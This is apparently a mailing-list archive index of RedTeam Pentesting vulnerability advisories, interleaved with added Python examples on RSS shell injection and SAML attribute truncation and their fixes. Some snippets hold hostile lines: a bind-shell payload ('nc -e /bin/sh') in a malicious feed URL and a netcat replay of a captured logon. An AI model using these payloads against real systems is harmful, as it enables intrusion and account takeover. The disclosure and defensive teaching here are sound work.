Time modification flaw in BSD securelevels on NetBSD and Linux

2006-01-10 Thread RedTeam Pentesting
urity. Doing security research RedTeam likes to enhance the common knowledgebase in security related areas. More information about RedTeam can be found at http://www.redteam-pentesting.de. -- RedTeam Pentesting Tel.: +49-(0)241-963 1300 Dennewartstr. 25-27 Fax : +4

BSD Securelevels: Circumventing protection of files flagged immutable

2006-01-11 Thread RedTeam Pentesting
eam offers interested business parties penetration tests to validate their security. Doing security research RedTeam likes to enhance the common knowledgebase in security related areas. More information about RedTeam can be found at http://www.redteam-pentesting.de. -- RedTeam Pentesting

PAJAX Remote Code Injection and File Inclusion Vulnerability

2006-04-14 Thread RedTeam Pentesting
3-04 Public release References == [1] http://www.auberger.com/pajax/3/ RedTeam === RedTeam offers interested business parties penetration tests to validate their security. Doing security research RedTeam likes to enhance the common knowledgebase in security related areas. More information

Perlpodder Remote Arbitrary Command Execution

2006-05-22 Thread RedTeam Pentesting
Proof of Concept ==== A minimal malicious server rss feed which exploits the "echo" call may look as follows: RedTeam Pentesting Example Malicious Server Feed http://www.example.com/example.mp3 >> /dev/null; nc -e /bin/sh -l -p 1337 &#" le

Prodder Remote Arbitrary Command Execution

2006-05-22 Thread RedTeam Pentesting
ever properly sanitized, so it is possible to include arbitrary shell commands in the URL which will then be executed using system() (see line 457). Proof of Concept ==== A minimal malicious server rss feed may look as follows: RedTeam Pentesting Example Malicious Server Feed
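The Perlpodder and Prodder entries above describe the same flaw: an enclosure URL from an untrusted RSS feed is spliced unsanitized into a string that is handed to system(). The following is an added example, not code from either advisory or from those projects. The feed, the wget command line and all function names are constructed for illustration. It parses the feed, shows which extra command a shell would end up running, and shows the fix: validate the URL and pass an argv list so no shell ever parses attacker-controlled bytes.

```python
# Added example, not code from the Perlpodder or Prodder advisories.
import shlex
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Constructed sample feed modelled on the advisories' proof of concept.
# The enclosure URL carries a shell payload; nothing here executes it.
MALICIOUS_FEED = """<rss version="2.0"><channel>
  <title>Example Malicious Server Feed</title>
  <item>
    <title>Episode 1</title>
    <enclosure type="audio/mpeg"
      url="http://www.example.com/example.mp3 &gt;&gt; /dev/null; nc -e /bin/sh -l -p 1337 &amp;"/>
  </item>
</channel></rss>"""

SEPARATORS = {";", "&", "|", "&&", "||"}


def enclosure_urls(feed_xml):
    """Return every <enclosure url="..."> value from an RSS 2.0 document."""
    return [e.get("url", "") for e in ET.fromstring(feed_xml).iter("enclosure")]


def vulnerable_command(url):
    """The flawed pattern: the attacker-controlled URL is interpolated, unquoted,
    into a string destined for system(). Returned as a string, never run."""
    return "wget -q -O episode.mp3 " + url


def injected_commands(cmd):
    """Tokenise cmd the way a POSIX shell would and return the command names
    that follow each command separator, i.e. what the attacker gets to run."""
    lexer = shlex.shlex(cmd, punctuation_chars=True)
    lexer.whitespace_split = True
    tokens = list(lexer)
    return [tokens[i + 1] for i, tok in enumerate(tokens)
            if tok in SEPARATORS and i + 1 < len(tokens)]


def is_safe_url(url):
    """Accept only absolute http(s) URLs without whitespace or control
    characters (neither is ever valid in a URL)."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.netloc:
        return False
    return not any(ch.isspace() or ord(ch) < 0x20 for ch in url)


def safe_argv(url):
    """The fix: validate, then build an argv list for subprocess.run/execve so
    no shell parses the URL. A URL such as http://host/a;nc would pass
    is_safe_url, and that is fine: in an argv list the ';' reaches the
    downloader as data, not the shell as syntax."""
    if not is_safe_url(url):
        raise ValueError("rejected enclosure URL: %r" % url)
    return ["wget", "-q", "-O", "episode.mp3", url]


if __name__ == "__main__":
    for url in enclosure_urls(MALICIOUS_FEED):
        cmd = vulnerable_command(url)
        print("shell would run:", cmd)
        print("attacker-supplied commands:", injected_commands(cmd))
        try:
            print("argv:", safe_argv(url))
        except ValueError as err:
            print("rejected:", err)
```

Running the script prints the injected `nc` command that a system() call would start and then rejects the URL. The argv form is the actual fix; the URL validation is defence in depth and would not be sufficient on its own if a shell were still involved.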

Advisory: Authentication bypass in phpBannerExchange

2006-06-15 Thread RedTeam Pentesting
ix === Upgrade to version 2.0 RC6 Security Risk = The security risk is high because an attacker could gain access to an administrator account and view and alter the database and hereby compromise the whole application. History === 2006-06-09 Discovery of the problem 2006-06-1

Advisory: Unauthorized password recovery in phpBannerExchange

2006-06-15 Thread RedTeam Pentesting
d alter the database and hereby compromise the whole application. History === 2006-06-09 Discovery of the problem 2006-06-10 Vendor is informed 2006-06-12 Vendor released fixed version References == [1] http://www.eschew.net/scripts/phpbe/2.0/ RedTeam === RedTeam Pentesting is

Advisory: Remote command execution in planetGallery

2006-07-20 Thread RedTeam Pentesting
13 Vendor is informed 2006-07-14 Vendor releases fixed version 2006-07-20 Advisory is released References == [1] http://www.planetc.de/download/planetgallery/planetgallery.html RedTeam === RedTeam Pentesting is offering individual penetration tests, short pentests, performed by a te

Authentication bypass in BytesFall Explorer

2006-10-31 Thread RedTeam Pentesting
security risk medium. BytesFall Explorer can be compromised totally when PHP Magic Quotes are not enabled. Though Magic Quotes do not represent real security, they are a workaround for these problems. History === 2006-10-06 Discovery of the vulnerabilities 2006-10-06 Vendor is informed 2006-10-06 Ve

[RT-SA-2013-001] Advisory: Exim with Dovecot: Typical Misconfiguration Leads to Remote Command Execution

2013-05-13 Thread RedTeam Pentesting GmbH
a common use case for Dovecot and Exim, this configuration is considered to be a high risk. History === 2013-03-05 Vulnerability identified 2013-05-02 Vendor notified 2013-05-02 Vendor confirmed the vulnerability 2013-05-02 Vendor removed the offending line from the Dovecot wiki 2013-05-03 Ad

[RT-SA-2014-001] McAfee ePolicy Orchestrator: XML External Entity Expansion in Dashboard

2014-02-25 Thread RedTeam Pentesting GmbH
Advisory: McAfee ePolicy Orchestrator XML External Entity Expansion in Dashboard RedTeam Pentesting identified an XML external entity expansion vulnerability in McAfee ePolicy Orchestrator's (ePO) dashboard feature. Users with the ability to create new dashboards in the eP

[RT-SA-2014-002] rexx Recruitment: Cross-Site Scripting in User Registration

2014-03-28 Thread RedTeam Pentesting GmbH
Advisory: rexx Recruitment Cross-Site Scripting in User Registration RedTeam Pentesting discovered a cross-site scripting (XSS) vulnerability in rexx Recruitment's user registration page during a penetration test. If attackers can persuade users to click on a prepared link or redirect th

[RT-SA-2014-003] Metadata Information Disclosure in OrbiTeam BSCW

2014-05-08 Thread RedTeam Pentesting GmbH
Advisory: Metadata Information Disclosure in OrbiTeam BSCW RedTeam Pentesting discovered an information disclosure vulnerability in OrbiTeam's BSCW collaboration software. An unauthenticated attacker can disclose metadata about internal objects which are stored in BSCW. Details === Pr

[RT-SA-2014-004] Remote Command Execution in webEdition CMS Installer Script

2014-05-29 Thread RedTeam Pentesting GmbH
Advisory: Remote Command Execution in webEdition CMS Installer Script RedTeam Pentesting discovered a remote command execution vulnerability in the installer script of the webEdition CMS during a penetration test. If the installer script is not manually removed after installation, attackers

[RT-SA-2014-005] SQL Injection in webEdition CMS File Browser Installer Script

2014-05-29 Thread RedTeam Pentesting GmbH
Advisory: SQL Injection in webEdition CMS File Browser RedTeam Pentesting discovered an SQL injection vulnerability in the file browser component of webEdition CMS during a penetration test. Unauthenticated attackers can get read-only access on the SQL database used by webEdition and read for

[RT-SA-2014-006] Directory Traversal in DevExpress ASP.NET File Manager

2014-06-05 Thread RedTeam Pentesting GmbH
Advisory: Directory Traversal in DevExpress ASP.NET File Manager During a penetration test RedTeam Pentesting discovered a directory traversal vulnerability in DevExpress' ASP.NET File Manager and File Upload. Attackers are able to read arbitrary files by specifying a relative path. De

[RT-SA-2013-002] Endeca Latitude Cross-Site Request Forgery

2014-06-25 Thread RedTeam Pentesting GmbH
Advisory: Endeca Latitude Cross-Site Request Forgery RedTeam Pentesting discovered a Cross-Site Request Forgery (CSRF) vulnerability in Endeca Latitude. Using this vulnerability, an attacker might be able to change several different settings of the Endeca Latitude instance or disable it entirely

[RT-SA-2013-003] Endeca Latitude Cross-Site Scripting

2014-06-25 Thread RedTeam Pentesting GmbH
Advisory: Endeca Latitude Cross-Site Scripting RedTeam Pentesting discovered a Cross-Site Scripting (XSS) vulnerability in Endeca Latitude. By exploiting this vulnerability an attacker is able to execute arbitrary JavaScript code in the context of other Endeca Latitude users. Details

[RT-SA-2014-008] Python CGIHTTPServer File Disclosure and Potential Code Execution

2014-06-27 Thread RedTeam Pentesting GmbH
's working directory or in its subdirectories. The CGIHTTPServer code does contain this warning: "SECURITY WARNING: DON'T USE THIS CODE UNLESS YOU ARE INSIDE A FIREWALL" Even when used on a local computer this may allow other local users to execute code in the context of another use

[RT-SA-2014-009] Information Disclosure in TYPO3 Extension ke_questionnaire

2014-12-01 Thread RedTeam Pentesting GmbH
ntinues to release updated versions, no response whether the security issue is fixed 2014-11-14 CVE number assigned 2014-12-01 Advisory released References == [1] https://code.google.com/p/wfuzz/ RedTeam Pentesting GmbH === RedTeam Pentesting offer

[RT-SA-2014-007] Remote Code Execution in TYPO3 Extension ke_dompdf

2014-12-01 Thread RedTeam Pentesting GmbH
Advisory: Remote Code Execution in TYPO3 Extension ke_dompdf During a penetration test RedTeam Pentesting discovered a remote code execution vulnerability in the TYPO3 extension ke_dompdf, which allows attackers to execute arbitrary PHP commands in the context of the webserver. Details

[RT-SA-2014-011] EntryPass N5200 Credentials Disclosure

2014-12-01 Thread RedTeam Pentesting GmbH
ntacted vendor again since no fix or roadmap was provided. 2014-10-28 CVE number requested 2014-11-14 CVE number assigned 2014-12-01 Advisory released RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests, short pentests, performed by a team of s

[RT-SA-2014-012] Unauthenticated Remote Code Execution in IBM Endpoint Manager Mobile Device Management Components

2014-12-02 Thread RedTeam Pentesting GmbH
Advisory: Unauthenticated Remote Code Execution in IBM Endpoint Manager Mobile Device Management Components During a penetration test, RedTeam Pentesting discovered that several IBM Endpoint Manager Components are based on Ruby on Rails and use static secret_token values. With these

[RT-SA-2014-015] Cross-site Scripting in Tapatalk Plugin for WoltLab Burning Board 4.0

2015-01-12 Thread RedTeam Pentesting GmbH
Advisory: Cross-site Scripting in Tapatalk Plugin for WoltLab Burning Board 4.0 RedTeam Pentesting discovered a cross-site scripting (XSS) vulnerability in the Tapatalk plugin for the WoltLab Burning Board forum software, which allows attackers to inject arbitrary JavaScript code via

CVE-2014-8870: Arbitrary Redirect in Tapatalk Plugin for WoltLab Burning Board 4.0

2015-01-12 Thread RedTeam Pentesting GmbH
?board_url=https://www.redteam-pentesting.de CVE-2014-8870 was assigned to this issue. -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachen https://www.redteam-pentesting.de Germany

[RT-SA-2014-010] AVM FRITZ!Box Firmware Signature Bypass

2015-01-22 Thread RedTeam Pentesting GmbH
TZ!Box 7390 2014-11-14 CVE number assigned 2014-12-08 Vendor provided updated list of affected and fixed models/versions 2014-12-15 Vendor finished releasing fixed versions for all current models 2015-01-21 Advisory released RedTeam Pentesting GmbH === RedTeam Pentesting offers in

[RT-SA-2014-013] Cross-Site Scripting in IBM Endpoint Manager Relay Diagnostics Page

2015-02-10 Thread RedTeam Pentesting GmbH
Advisory: Cross-Site Scripting in IBM Endpoint Manager Relay Diagnostics Page During a penetration test, RedTeam Pentesting discovered that the IBM Endpoint Manager Relay Diagnostics page allows anybody to persistently store HTML and JavaScript code that is executed when the page is

[RT-SA-2014-016] Directory Traversal and Arbitrary File Disclosure in hybris Commerce Software Suite

2015-02-18 Thread RedTeam Pentesting GmbH
Advisory: Directory Traversal and Arbitrary File Disclosure in hybris Commerce Software Suite During a penetration test, RedTeam Pentesting discovered a Directory Traversal vulnerability in hybris Commerce software suite. This vulnerability allows attackers to download arbitrary files

[RT-SA-2012-001] Bugzilla: Cross-Site Scripting in Chart Generator

2012-01-03 Thread RedTeam Pentesting GmbH
Advisory: Bugzilla: Cross-Site Scripting in Chart Generator RedTeam Pentesting discovered a Cross-Site Scripting (XSS) vulnerability in Bugzilla's chart generator during a penetration test. If attackers can persuade users to click on a prepared link or redirect them to such a link fr

[RT-SA-2016-002] Cross-site Scripting in Securimage 3.6.2

2016-03-22 Thread RedTeam Pentesting GmbH
Advisory: Cross-site Scripting in Securimage 3.6.2 RedTeam Pentesting discovered a cross-site scripting (XSS) vulnerability in the Securimage CAPTCHA software, which allows attackers to inject arbitrary JavaScript code via a crafted URL. Details === Product: Securimage Affected Versions

[RT-SA-2015-012] XML External Entity Expansion in Paessler PRTG Network Monitor

2016-05-31 Thread RedTeam Pentesting GmbH
ability 2015-09-04 CVE ID requested 2015-09-24 CVE ID requested again 2015-10-07 CVE ID assigned 2015-10-21 Vendor contacted 2016-04-04 Vendor released fixed version 2016-05-31 Advisory released References == [1] https://www.paessler.com [2] https://www.paessler.com/prtg/history/stable

[RT-SA-2016-004] Websockify: Remote Code Execution via Buffer Overflow

2016-05-31 Thread RedTeam Pentesting GmbH
Advisory: Websockify: Remote Code Execution via Buffer Overflow RedTeam Pentesting discovered a buffer overflow vulnerability in the C implementation of Websockify, which allows attackers to execute arbitrary code. Details === Product: Websockify C implementation Affected Versions: all

[RT-SA-2016-005] Unauthenticated File Upload in Relay Ajax Directory Manager may Lead to Remote Command Execution

2016-05-31 Thread RedTeam Pentesting GmbH
ther evaluated. Timeline 2015-11-19 Vulnerability discovered 2016-04-07 Customer approved disclosure of vulnerability 2016-05-12 Developers contacted, project is no longer maintained 2016-05-31 Advisory published References == [1] https://github.com/HadoDokis/Relay-Ajax-Director

[RT-SA-2016-003] Less.js: Compilation of Untrusted LESS Files May Lead to Code Execution through the JavaScript Less Compiler

2016-11-30 Thread RedTeam Pentesting GmbH
Advisory: Less.js: Compilation of Untrusted LESS Files May Lead to Code Execution through the JavaScript Less Compiler RedTeam Pentesting discovered behaviour in the Less.js compiler, which allows execution of arbitrary code if an untrusted LESS file is compiled. Details

[RT-SA-2017-011] Remote Command Execution in PDNS Manager

2017-07-11 Thread RedTeam Pentesting GmbH
Advisory: Remote Command Execution in PDNS Manager RedTeam Pentesting discovered that PDNS Manager is vulnerable to a remote command execution vulnerability, if for any reason the configuration file config/config-user.php does not exist. Details === Product: PDNS Manager Affected Versions

[RT-SA-2017-004] Unauthenticated Arbitrary File Disclosure in REDDOXX Appliance

2017-07-24 Thread RedTeam Pentesting GmbH
Advisory: Unauthenticated Arbitrary File Disclosure in REDDOXX Appliance RedTeam Pentesting discovered an arbitrary file disclosure vulnerability in the REDDOXX appliance software, which allows unauthenticated attackers to download arbitrary files from the affected system. Details

[RT-SA-2017-006] Arbitrary File Disclosure with root Privileges via RdxEngine-API in REDDOXX Appliance

2017-07-24 Thread RedTeam Pentesting GmbH
Advisory: Arbitrary File Disclosure with root Privileges via RdxEngine-API in REDDOXX Appliance RedTeam Pentesting discovered an arbitrary file disclosure vulnerability in the REDDOXX appliance software, which allows unauthenticated attackers to list directory contents and download arbitrary

[RT-SA-2017-007] Undocumented Administrative Service Account in REDDOXX Appliance

2017-07-24 Thread RedTeam Pentesting GmbH
Advisory: Undocumented Administrative Service Account in REDDOXX Appliance RedTeam Pentesting discovered an undocumented service account in the REDDOXX appliance software, which allows attackers to access the administrative interface of the appliance and change its configuration. Details

[RT-SA-2017-003] Cross-Site Scripting in REDDOXX Appliance

2017-07-24 Thread RedTeam Pentesting GmbH
Advisory: Cross-Site Scripting in REDDOXX Appliance RedTeam Pentesting discovered a cross-site scripting (XSS) vulnerability in the REDDOXX appliance software, which allows attackers to inject arbitrary JavaScript code via a crafted URL. Details === Product: REDDOXX Appliance Affected

[RT-SA-2017-009] Remote Command Execution as root in REDDOXX Appliance

2017-07-24 Thread RedTeam Pentesting GmbH
Advisory: Remote Command Execution as root in REDDOXX Appliance RedTeam Pentesting discovered a remote command execution vulnerability in the REDDOXX appliance software, which allows attackers to execute arbitrary commands with root privileges while unauthenticated. Details === Product

[RT-SA-2017-005] Unauthenticated Extraction of Session-IDs in REDDOXX Appliance

2017-07-24 Thread RedTeam Pentesting GmbH
Advisory: Unauthenticated Extraction of Session-IDs in REDDOXX Appliance RedTeam Pentesting discovered an information disclosure vulnerability in the REDDOXX appliance software, which allows unauthenticated attackers to extract valid session IDs. Details === Product: REDDOXX Appliance

[RT-SA-2017-008] Unauthenticated Access to Diagnostic Functions in REDDOXX Appliance

2017-07-24 Thread RedTeam Pentesting GmbH
Advisory: Unauthenticated Access to Diagnostic Functions in REDDOXX Appliance RedTeam Pentesting discovered a vulnerability which allows attackers unauthenticated access to the diagnostic functions of the administrative interface of the REDDOXX appliance. The functions allow, for example, to

[RT-SA-2015-011] WebClientPrint Processor 2.0: No Validation of TLS Certificates

2017-08-22 Thread RedTeam Pentesting GmbH
Advisory: WebClientPrint Processor 2.0: No Validation of TLS Certificates RedTeam Pentesting discovered that WebClientPrint Processor (WCPP) does not validate TLS certificates when initiating HTTPS connections. Thus, a man-in-the-middle attacker may intercept and/or modify HTTPS traffic in

[RT-SA-2015-010] WebClientPrint Processor 2.0: Unauthorised Proxy Modification

2017-08-22 Thread RedTeam Pentesting GmbH
Advisory: WebClientPrint Processor 2.0: Unauthorised Proxy Modification RedTeam Pentesting discovered that attackers can configure a proxy host and port to be used when fetching print jobs with WebClientPrint Processor (WCPP). This proxy setting may be distributed via specially crafted websites

[RT-SA-2015-009] WebClientPrint Processor 2.0: Remote Code Execution via Updates

2017-08-22 Thread RedTeam Pentesting GmbH
Advisory: WebClientPrint Processor 2.0: Remote Code Execution via Updates RedTeam Pentesting discovered that rogue updates trigger a remote code execution vulnerability in WebClientPrint Processor (WCPP). These updates may be distributed through specially crafted websites and are processed

[RT-SA-2015-008] WebClientPrint Processor 2.0: Remote Code Execution via Print Jobs

2017-08-22 Thread RedTeam Pentesting GmbH
Advisory: WebClientPrint Processor 2.0: Remote Code Execution via Print Jobs RedTeam Pentesting discovered that malicious print jobs can be used to trigger a remote code execution vulnerability in WebClientPrint Processor (WCPP). These print jobs may be distributed via specially crafted websites

[RT-SA-2015-003] Alcatel-Lucent OmniSwitch Web Interface Weak Session ID

2015-06-10 Thread RedTeam Pentesting GmbH
Advisory: Alcatel-Lucent OmniSwitch Web Interface Weak Session ID During a penetration test, RedTeam Pentesting discovered a vulnerability in the management web interface of an Alcatel-Lucent OmniSwitch 6450. This interface uses easily guessable session IDs, which allows attackers to authenticate

[RT-SA-2015-004] Alcatel-Lucent OmniSwitch Web Interface Cross-Site Request Forgery

2015-06-10 Thread RedTeam Pentesting GmbH
Advisory: Alcatel-Lucent OmniSwitch Web Interface Cross-Site Request Forgery During a penetration test, RedTeam Pentesting discovered a vulnerability in the management web interface of an Alcatel-Lucent OmniSwitch 6450. The management web interface has no protection against cross-site request

[RT-SA-2015-002] SQL Injection in TYPO3 Extension Akronymmanager

2015-06-15 Thread RedTeam Pentesting GmbH
15-04-08 Vendor announced fixed version available at the end of April 2015-05-13 Requested update from vendor 2015-05-15 Vendor requests more time 2015-05-21 Requested update from vendor 2015-05-22 Vendor states that upload to extension registry doesn't work 2015-06-03 Requested update from

[RT-SA-2015-006] Buffalo LinkStation Authentication Bypass

2015-10-08 Thread RedTeam Pentesting GmbH
1.70 2015-06-09 Verified that vulnerability is not fixed in version 1.70 2015-06-09 Vendor responded: vulnerability is already known and being worked on, release date is not known 2015-06-09 Vendor provided list of affected devices 2015-07-10 Vendor queried for update, no response 2015-08-03 Vendor

[RT-SA-2015-013] Symfony PHP Framework: Session Fixation In "Remember Me" Login Functionality

2015-12-22 Thread RedTeam Pentesting GmbH
2015-12-22 Advisory released References == [0] https://github.com/symfony/symfony-demo [1] https://symfony.com/doc/current/cookbook/security/remember_me.html [2] https://symfony.com/blog/cve-2015-8124-session-fixation-in-the-remember-me-login-feature RedTeam Pentesting GmbH =

[RT-SA-2014-014] AVM FRITZ!Box: Arbitrary Code Execution Through Manipulated Firmware Images

2016-01-07 Thread RedTeam Pentesting GmbH
lity is therefore considered to pose a medium risk. Timeline 2014-10-14 Vulnerability identified 2014-10-16 Vendor notified 2014-11-11 CVE requested 2014-11-11 Vendor announced patch 2014-11-14 CVE number assigned 2014-11-17 Vendor provided fixed version to RedTeam Pentesting 2015-07-16

[RT-SA-2015-001] AVM FRITZ!Box: Remote Code Execution via Buffer Overflow

2016-01-07 Thread RedTeam Pentesting GmbH
Advisory: AVM FRITZ!Box: Remote Code Execution via Buffer Overflow RedTeam Pentesting discovered that several models of the AVM FRITZ!Box are vulnerable to a stack-based buffer overflow, which allows attackers to execute arbitrary code on the device. Details === Product: AVM FRITZ!Box 3272

[RT-SA-2015-005] o2/Telefonica Germany: ACS Discloses VoIP/SIP Credentials

2016-01-07 Thread RedTeam Pentesting GmbH
ability allows the unauthorised usage of foreign VoIP telephone numbers. The victim will be charged with all costs resulting from fraudulent phone calls. Furthermore, an attacker may answer phone calls on behalf of the victim. Customers have no means of defending themselves from such an attack. Chances are th

[RT-SA-2011-002] SugarCRM list privilege restriction bypass

2011-03-15 Thread RedTeam Pentesting GmbH
Advisory: SugarCRM list privilege restriction bypass RedTeam Pentesting discovered a vulnerability in SugarCRM that allows logged in users to bypass restrictions of their list privilege, allowing them to list all entries. Details === Product: SugarCRM Community Edition SugarCRM

[RT-SA-2011-001] nostromo nhttpd directory traversal leading to arbitrary command execution

2011-03-15 Thread RedTeam Pentesting GmbH
Advisory: nostromo nhttpd directory traversal leading to arbitrary command execution During a penetration test, RedTeam Pentesting discovered a directory traversal vulnerability leading to arbitrary command execution in the nostromo HTTP server. Details === Product: nostromo

[RT-SA-2011-003] Authentication Bypass in Configuration Import and Export of ZyXEL ZyWALL USG Appliances

2011-05-04 Thread RedTeam Pentesting GmbH
ce. Therefore the risk is estimated as high. History === 2011-03-07 Vulnerability identified 2011-04-06 Customer approved disclosure to vendor 2011-04-07 Vendor notified 2011-04-07 First reactions of vendor, issue is being investigated 2011-04-08 Meeting with vendor 2011-04-15 Vulnerabili

[RT-SA-2011-004] Client Side Authorization ZyXEL ZyWALL USG Appliances Web Interface

2011-05-04 Thread RedTeam Pentesting GmbH
ally sensitive information (like the password hashes of all other users). The risk of this vulnerability is estimated as medium. History === 2011-03-07 Vulnerability identified 2011-04-06 Customer approved disclosure to vendor 2011-04-07 Vendor notified 2011-04-08 Meeting with vendor 2011-04-15 V

[RT-SA-2011-005] Owl Intranet Engine: Authentication Bypass

2011-12-15 Thread RedTeam Pentesting GmbH
Advisory: Owl Intranet Engine: Authentication Bypass During a penetration test, RedTeam Pentesting discovered an Authentication Bypass vulnerability in the Owl Intranet Engine, which allows unauthenticated users administrative access to the affected systems. Details === Product: Owl

[RT-SA-2011-006] Owl Intranet Engine: Information Disclosure and Unsalted Password Hashes

2011-12-15 Thread RedTeam Pentesting GmbH
Vendor releases new version that does not fix the issue 2011-12-15 Advisory released RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company ne

[RT-SA-2016-008] XML External Entity Expansion in Ladon Webservice

2017-11-10 Thread RedTeam Pentesting GmbH
set=UTF-8' \ -H $'SOAPAction: \"http://localhost:/HelloService/soap11/sayhello\";' \ --data-binary $'http://www.w3.org/2001/XMLSchema-instance\"; xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"; xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/enve

[RT-SA-2017-013] Truncation of SAML Attributes in Shibboleth 2

2018-01-16 Thread RedTeam Pentesting GmbH
Advisory: Truncation of SAML Attributes in Shibboleth 2 RedTeam Pentesting discovered that the shibd service of Shibboleth 2 does not extract SAML attribute values in a robust manner. By inserting XML entities into a SAML response, attackers may truncate attribute values without breaking the
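The Shibboleth entry above describes a consumer that does not extract SAML attribute values robustly: inserting XML character or entity references into the response makes a SAX-style parser deliver the text in several callbacks, and a consumer that keeps only the first callback sees a truncated value. Because canonicalisation resolves such references before a signature is computed or checked, the signed bytes are unchanged. The following is an added example, not code from the advisory or from Shibboleth. The minimal attribute fragments, the element name AttributeValue and all function names are constructed; the naive extractor stands in for the fragile pattern and the robust one shows the fix.

```python
# Added example, not code from the Shibboleth advisory or the Shibboleth project.
import xml.etree.ElementTree as ET
from xml.parsers import expat

# Constructed sample fragments. A real SAML response would carry these inside a
# signed <Assertion>; only the attribute value matters for the mechanism shown.
LEGIT = ('<Attribute Name="mail">'
         '<AttributeValue>user@example.org</AttributeValue></Attribute>')
# Same parser-visible content, but the attacker rewrote '@' as '&#64;'.
ATTACK = ('<Attribute Name="mail">'
          '<AttributeValue>user&#64;example.org</AttributeValue></Attribute>')


def value_chunks(xml_text):
    """Return the text of <AttributeValue> exactly as expat delivers it:
    one CharacterData callback per segment, a character reference on its own."""
    chunks, state = [], {"inside": False}

    def start(name, attrs):
        if name == "AttributeValue":
            state["inside"] = True

    def end(name):
        if name == "AttributeValue":
            state["inside"] = False

    def chars(data):
        if state["inside"]:
            chunks.append(data)

    parser = expat.ParserCreate()
    parser.buffer_text = False  # do not coalesce segments (the default)
    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = chars
    parser.Parse(xml_text, True)
    return chunks


def naive_value(xml_text):
    """The fragile pattern: treat the first text callback as the whole value."""
    chunks = value_chunks(xml_text)
    return chunks[0] if chunks else ""


def robust_value(xml_text):
    """The fix: let the parser assemble the complete text node (or, with a SAX
    handler, concatenate every callback until the end-element event)."""
    return ET.fromstring(xml_text).find("AttributeValue").text


def same_canonical_form(xml_a, xml_b):
    """C14N resolves character references, so the form a signature covers is
    identical for the legitimate and the rewritten fragment."""
    return ET.canonicalize(xml_a) == ET.canonicalize(xml_b)


if __name__ == "__main__":
    print("expat segments:", value_chunks(ATTACK))
    print("naive extractor sees:", naive_value(ATTACK))
    print("robust extractor sees:", robust_value(ATTACK))
    print("canonical forms equal:", same_canonical_form(LEGIT, ATTACK))
```

The naive extractor reports `user` for the rewritten fragment while the legitimate one yields the full address; any prefix of a value the issuer legitimately signed can be presented this way. Whether that is exploitable depends on what the relying party does with the truncated value, which is why the fix belongs in the extractor, not in downstream checks.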

[RT-SA-2018-001] Arbitrary Redirect in Tuleap

2018-03-08 Thread RedTeam Pentesting GmbH
Advisory: Arbitrary Redirect in Tuleap RedTeam Pentesting discovered an arbitrary redirect vulnerability in the redirect mechanism of the application lifecycle management platform Tuleap. Details === Product: Tuleap Affected Versions: > 9.17.99.93 Fixed Versions: >= 9.17

[RT-SA-2017-012] Shopware Cart Accessible by Third-Party Websites

2018-03-13 Thread RedTeam Pentesting GmbH
Advisory: Shopware Cart Accessible by Third-Party Websites RedTeam Pentesting discovered that the shopping cart implemented by Shopware offers an insecure API. Malicious, third-party websites may abuse this API to list, add or remove products from a user's cart. Details === Pr

[RT-SA-2017-015] CyberArk Password Vault Memory Disclosure

2018-04-09 Thread RedTeam Pentesting GmbH
age does not contain any random, unpredictable data. Therefore, it may be replayed at will once captured. This can be accomplished using netcat: $ cat logon.bin | nc -v 10.0.0.5 1858 ---------

[RT-SA-2017-014] CyberArk Password Vault Web Access Remote Code Execution

2018-04-09 Thread RedTeam Pentesting GmbH
ed "Logon" API method. Analysis of this token by RedTeam Pentesting revealed that it consists of a base64 encoded, serialized .NET object of the type "CyberArk.Services.Web.SessionIdentifiers". This class consists of four string attributes which hold information about a user's

[RT-SA-2018-003] Cisco RV320 Unauthenticated Diagnostic Data Retrieval

2019-01-24 Thread RedTeam Pentesting GmbH
Advisory: Cisco RV320 Unauthenticated Diagnostic Data Retrieval RedTeam Pentesting discovered that the Cisco RV320 router exposes sensitive diagnostic data without authentication through the device's web interface. Details === Product: Cisco RV320 Dual Gigabit WAN VPN Router, pos

[RT-SA-2018-004] Cisco RV320 Command Injection

2019-01-24 Thread RedTeam Pentesting GmbH
Advisory: Cisco RV320 Command Injection RedTeam Pentesting discovered a command injection vulnerability in the web-based certificate generator feature of the Cisco RV320 router. Details === Product: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others Affected Versions: 1.4.2.15 and

[RT-SA-2018-002] Cisco RV320 Unauthenticated Configuration Export

2019-01-24 Thread RedTeam Pentesting GmbH
Advisory: Cisco RV320 Unauthenticated Configuration Export RedTeam Pentesting discovered that the configuration of a Cisco RV320 router may be exported without authentication through the device's web interface. Details === Product: Cisco RV320 Dual Gigabit WAN VPN Router, possibly o

[RT-SA-2019-007] Code Execution via Insecure Shell Function getopt_simple

2019-03-26 Thread RedTeam Pentesting GmbH
Advisory: Code Execution via Insecure Shell Function getopt_simple RedTeam Pentesting discovered that the shell function "getopt_simple", as presented in the "Advanced Bash-Scripting Guide", allows execution of attacker-controlled commands. Details === Product: Adv

[RT-SA-2019-004] Cisco RV320 Unauthenticated Diagnostic Data Retrieval

2019-03-27 Thread RedTeam Pentesting GmbH
Advisory: Cisco RV320 Unauthenticated Diagnostic Data Retrieval RedTeam Pentesting discovered that the Cisco RV320 router still exposes sensitive diagnostic data without authentication via the device's web interface due to an inadequate fix by the vendor. Details === Product: Cisco

[RT-SA-2019-005] Cisco RV320 Command Injection Retrieval

2019-03-27 Thread RedTeam Pentesting GmbH
Advisory: Cisco RV320 Command Injection RedTeam Pentesting discovered a command injection vulnerability in the web-based certificate generator feature of the Cisco RV320 router which was inadequately patched by the vendor. Details === Product: Cisco RV320 Dual Gigabit WAN VPN Router

[RT-SA-2019-003] Cisco RV320 Unauthenticated Configuration Export

2019-03-27 Thread RedTeam Pentesting GmbH
Advisory: Cisco RV320 Unauthenticated Configuration Export RedTeam Pentesting discovered that the configuration of a Cisco RV320 router can still be exported without authentication via the device's web interface due to an inadequate fix by the vendor. Details === Product: Cisco RV320

[RT-SA-2019-002] Directory Traversal in Cisco Expressway Gateway

2019-05-17 Thread RedTeam Pentesting GmbH
